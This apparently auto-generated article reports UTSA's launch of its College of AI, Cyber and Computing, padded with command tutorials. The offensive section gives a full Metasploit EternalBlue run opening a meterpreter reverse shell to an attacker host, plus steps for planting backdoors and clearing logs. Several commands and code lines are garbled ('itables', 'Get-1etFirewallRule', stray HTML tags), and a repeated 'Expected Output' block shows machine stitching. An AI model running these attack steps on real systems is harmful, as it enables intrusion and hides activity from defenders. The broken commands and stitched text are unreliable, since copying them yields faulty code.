Listen to this Post

Introduction:
The University of Texas at San Antonio (UTSA) officially launched its College of AI, Cyber and Computing (CAICC) on September 1, 2025, consolidating academic programs in artificial intelligence, cybersecurity, computing, and data science into a single interdisciplinary powerhouse. Headquartered in the heart of downtown San Antonio at San Pedro I and the newly completed San Pedro II, the college positions itself at the intersection of academic rigor and real-world industry demand, leveraging the city’s status as the largest information security hub outside of Washington, D.C.. With more than 5,300 students enrolled across 11 undergraduate and 12 graduate programs, CAICC is not merely an academic unit—it is a workforce engine designed to close the 770,000+ unfilled cybersecurity and AI roles projected by 2031.
Learning Objectives:
- Understand the interdisciplinary structure and academic offerings of UTSA’s College of AI, Cyber and Computing, including its four core departments and research centers.
- Gain practical knowledge of cloud security hardening, AI model deployment, and offensive/defensive cybersecurity techniques relevant to the college’s curriculum.
- Learn how to navigate and utilize industry-standard tools and command-line utilities for system administration, network security, and AI infrastructure management.
You Should Know:
- The Four Pillars: Academic Departments and Degree Pathways
The College of AI, Cyber and Computing is built upon four academic departments: Computer Science, Computer Engineering, Information Systems and Cybersecurity, and Statistics and Data Science. This structure enables students to pursue specialized degrees while maintaining flexibility to move between disciplines. Undergraduate offerings include a B.S. in Computer Science with concentrations in Cloud and Systems, Cybersecurity, and AI and Data Science, alongside a fully online BBA in Cybersecurity—one of the top-ranked programs of its kind nationally.
At the graduate level, the college offers Master’s programs in Artificial Intelligence (with concentrations in Analytics, Computer Science, and Intelligent and Autonomous Systems), Cybersecurity Science, Data Analytics, and Cloud Computing graduate certificates. The AI MS program draws courses from multiple departments, providing a comprehensive education that bridges theory and application.
Step‑by‑step guide to exploring the curriculum:
- Visit the CAICC program catalog at `catalog.utsa.edu` to review degree requirements and course descriptions.
- Identify your track—AI, cybersecurity, cloud computing, or data science—and map out prerequisite courses.
- Leverage the interdisciplinary flexibility: students can switch between concentrations without losing progress, thanks to shared foundational coursework.
- Explore graduate certificates in Cloud Computing and Predictive Analytics as standalone credentials or stackable toward a master’s degree.
- Engage with the USAA Ascent Scholars Program, a competitive scholarship initiative that prepares high-potential undergraduates for professional tech careers.
-
Research Centers and Innovation Hubs: From NSCC to MATRIX
CAICC is distinguished by its integration with three major research centers: the National Security Collaboration Center (NSCC), the MATRIX AI Consortium for Human Well-Being, and the Center for Data Science. The NSCC, housed downtown, fosters public-private partnerships with over 60 national partners, including federal agencies and industry leaders, to advance applied research in cybersecurity, data analytics, and cloud computing. It also serves as the headquarters for the newly established Texas Cyber Command, the largest state-based cybersecurity department in America.
MATRIX, led by founding director Dr. Dhireesha Kudithipudi, is built around a single guiding question: “How do we design AI systems that improve human well-being?”. The consortium bridges science, healthcare, and policy, developing AI-powered infrastructure for clinicians, biomedical engineers, and public health researchers. Research spans neuromorphic computing, predictive healthcare analytics, and disaster resilience. The Center for Data Science, transitioning from the former School of Data Science, connects more than 50 researchers across seven colleges, focusing on generative AI, quantum computing, and security-aware data science.
Step‑by‑step guide to engaging with research centers:
- Explore NSCC partnerships: Visit `research.utsa.edu/nscc` to review current industry and government collaborators.
- Join MATRIX initiatives: Participate in workshops, seminars, and the MATRIX AI Scholar badge program to gain recognition for AI research contributions.
- Access the Center for Data Science: Leverage grant assistance and collaborative funding opportunities available through the center.
- Participate in Cyber Jedis research teams: Open to students of all skill levels, these teams provide hands-on cybersecurity research experience.
- Attend NSCC networking events: Engage with industry experts and government officials at regular demonstrations and briefings held at San Pedro I.
3. Cloud Security Hardening: Practical Commands and Configurations
The college’s curriculum emphasizes cloud computing and security, with a Graduate Certificate in Cloud Computing available for specialization. Students are expected to master cloud infrastructure security across AWS, Azure, and Google Cloud platforms. Below are essential commands and configurations for hardening cloud environments—skills directly applicable to CAICC coursework and industry internships.
Linux Commands for Cloud Security Auditing:
Check for open ports and listening services
sudo netstat -tulpn | grep LISTEN
Audit file permissions on sensitive directories
find /etc -type f -perm -o+w -exec ls -l {} \;
Review SSH configuration for security best practices
sudo cat /etc/ssh/sshd_config | grep -E "PermitRootLogin|PasswordAuthentication|Port"
Monitor failed login attempts
sudo grep "Failed password" /var/log/auth.log | tail -20
Set up a basic iptables firewall (allow SSH, HTTP, HTTPS only)
sudo iptables -A INPUT -p tcp --dport 22 -j ACCEPT
sudo iptables -A INPUT -p tcp --dport 80 -j ACCEPT
sudo itables -A INPUT -p tcp --dport 443 -j ACCEPT
sudo iptables -A INPUT -j DROP
Windows PowerShell Commands for System Hardening:
List all firewall rules
Get-1etFirewallRule | Where-Object {$_.Enabled -eq "True"}
Enable Windows Defender real-time protection
Set-MpPreference -DisableRealtimeMonitoring $false
Audit local user accounts
Get-LocalUser | Where-Object {$_.Enabled -eq $true}
Check for unnecessary services
Get-Service | Where-Object {$<em>.StartType -eq "Automatic" -and $</em>.Status -eq "Running"}
Configure Windows Update policies
Get-WindowsUpdateLog
Step‑by‑step guide to cloud hardening:
- Implement least-privilege IAM policies: Restrict user permissions to only what is necessary for their role.
- Enable multi-factor authentication (MFA) for all cloud console and SSH access.
- Configure VPC security groups to restrict inbound traffic to known IP ranges only.
- Enable cloud trail logging (AWS CloudTrail, Azure Monitor, GCP Cloud Logging) and set up alerts for anomalous activity.
- Regularly patch and update all virtual machines using automated update policies.
- Encrypt data at rest and in transit using service-managed or customer-managed keys.
4. Offensive and Defensive Cybersecurity Techniques
UTSA is one of only ten institutions nationwide designated by the NSA and DHS as a Center for Academic Excellence in Cyber Defense (CAE-CD), Cyber Operations (CAE-CO), and Cybersecurity Research (CAE-R). Students gain hands-on experience with defensive and offensive techniques across application security, digital forensics, intrusion detection, and industrial control systems.
Essential Nmap Commands for Network Reconnaissance:
Scan for open ports on a target nmap -sS -p- -T4 192.168.1.1 Service version detection nmap -sV -sC -O 192.168.1.1 Scan for specific vulnerabilities nmap --script vuln 192.168.1.1 UDP scan for DNS, SNMP, etc. nmap -sU -p 53,161,123 192.168.1.1
Basic Metasploit Framework Usage (educational/lab environments only):
msfconsole msf6 > search exploit/windows/smb/ms17_010_eternalblue msf6 > use exploit/windows/smb/ms17_010_eternalblue msf6 > set RHOSTS 192.168.1.100 msf6 > set PAYLOAD windows/x64/meterpreter/reverse_tcp msf6 > set LHOST 192.168.1.50 msf6 > exploit
Wireshark Filter Examples for Traffic Analysis:
Filter HTTP traffic http Filter by IP address ip.addr == 192.168.1.100 Filter for suspicious DNS queries dns.qry.name contains "malware" Filter for TCP SYN packets (connection attempts) tcp.flags.syn == 1 && tcp.flags.ack == 0
Step‑by‑step guide to penetration testing methodology:
- Reconnaissance: Gather publicly available information about the target (OSINT).
- Scanning: Use tools like Nmap, Nessus, or OpenVAS to identify open ports and vulnerabilities.
- Gaining Access: Exploit identified vulnerabilities using Metasploit or custom scripts (authorized environments only).
- Maintaining Access: Establish persistence through backdoors or scheduled tasks.
- Covering Tracks: Clear logs and remove artifacts (for educational purposes only).
-
AI Model Deployment and Security: MLOps and Adversarial Defenses
With the rise of generative AI and machine learning, CAICC emphasizes trustworthy AI, immersive human-computer interaction, and predictive healthcare analytics. Students learn to deploy AI models securely, protect against adversarial attacks, and ensure model fairness and transparency.
Docker Commands for AI Model Containerization:
Build a Docker image for a Python ML model docker build -t my-ai-model:latest . Run the container with GPU support docker run --gpus all -p 5000:5000 my-ai-model:latest View running containers docker ps Stop a container docker stop <container_id>
Python Snippet for Model Inference API (Flask):
from flask import Flask, request, jsonify
import joblib
import numpy as np
app = Flask(<strong>name</strong>)
model = joblib.load('model.pkl')
@app.route('/predict', methods=['POST'])
def predict():
data = request.get_json()
features = np.array(data['features']).reshape(1, -1)
prediction = model.predict(features)
return jsonify({'prediction': prediction.tolist()})
if <strong>name</strong> == '<strong>main</strong>':
app.run(host='0.0.0.0', port=5000, ssl_context='adhoc') Enable TLS
Adversarial Defense Techniques:
- Input validation and sanitization: Reject malformed or out-of-distribution inputs.
- Adversarial training: Augment training data with perturbed samples to improve robustness.
- Model hardening: Use defensive distillation or gradient masking to reduce vulnerability to evasion attacks.
- Regular security audits: Perform red-teaming exercises on deployed models.
Step‑by‑step guide to secure AI deployment:
- Containerize the model using Docker to ensure reproducibility and isolation.
- Implement API authentication (OAuth2, API keys) to restrict access.
- Enable TLS encryption for all API endpoints to protect data in transit.
- Set up logging and monitoring to detect unusual patterns or abuse.
- Regularly update dependencies to patch known vulnerabilities in libraries like TensorFlow, PyTorch, or scikit-learn.
What Undercode Say:
- Key Takeaway 1: UTSA’s College of AI, Cyber and Computing is a strategic response to the critical shortage of cybersecurity and AI professionals, offering a comprehensive, interdisciplinary curriculum that bridges academia and industry through downtown San Antonio’s tech ecosystem.
- Key Takeaway 2: The integration of research centers like NSCC, MATRIX, and the Center for Data Science provides students with unparalleled access to real-world projects, federal partnerships, and cutting-edge research in areas ranging from quantum computing to healthcare AI.
Analysis: The launch of CAICC represents more than just administrative consolidation—it is a deliberate alignment of educational outcomes with national security and economic development priorities. San Antonio’s emergence as a cybersecurity hub, reinforced by the Texas Cyber Command and NSA presence, creates a unique pipeline from classroom to career. The college’s downtown location, adjacent to government and industry partners, facilitates internships, collaborative research, and direct workforce placement. However, the rapid scaling to over 5,300 students poses challenges in maintaining faculty-to-student ratios and ensuring hands-on lab access. The $2 million gift from USAA and other industry investments will be critical in sustaining program quality and expanding scholarship opportunities. As AI and cyber threats evolve, the college’s emphasis on trustworthy AI, adversarial defense, and cloud security will remain relevant, but continuous curriculum updates and faculty development will be essential to keep pace with the field.
Expected Output:
Introduction:
The University of Texas at San Antonio officially launched its College of AI, Cyber and Computing (CAICC) on September 1, 2025, consolidating academic programs in artificial intelligence, cybersecurity, computing, and data science into a single interdisciplinary powerhouse. Headquartered in downtown San Antonio at San Pedro I and the newly completed San Pedro II, the college positions itself at the intersection of academic rigor and real-world industry demand, leveraging the city’s status as the largest information security hub outside of Washington, D.C. With more than 5,300 students enrolled across 11 undergraduate and 12 graduate programs, CAICC is not merely an academic unit—it is a workforce engine designed to close the 770,000+ unfilled cybersecurity and AI roles projected by 2031.
What Undercode Say:
- Key Takeaway 1: UTSA’s College of AI, Cyber and Computing is a strategic response to the critical shortage of cybersecurity and AI professionals, offering a comprehensive, interdisciplinary curriculum that bridges academia and industry through downtown San Antonio’s tech ecosystem.
- Key Takeaway 2: The integration of research centers like NSCC, MATRIX, and the Center for Data Science provides students with unparalleled access to real-world projects, federal partnerships, and cutting-edge research in areas ranging from quantum computing to healthcare AI.
Prediction:
- +1 The college is poised to become a national model for AI-cybersecurity education, attracting increased federal research funding and industry partnerships over the next five years.
- +1 San Antonio’s downtown revitalization, anchored by CAICC and the Texas Cyber Command, will accelerate the city’s transformation into a premier technology and innovation corridor.
- -1 The rapid enrollment growth may strain infrastructure and faculty resources, potentially impacting the quality of hands-on lab experiences if additional investments are not secured.
- +1 Graduates of CAICC will be highly sought after, with employment rates and starting salaries likely to exceed national averages for computer science and cybersecurity disciplines.
- -1 The evolving threat landscape and rapid AI advancements will require continuous curriculum overhauls, posing challenges for faculty development and program agility.
▶️ Related Video (68% Match):
🎯Let’s Practice For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
IT/Security Reporter URL:
Reported By: Hop On – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅


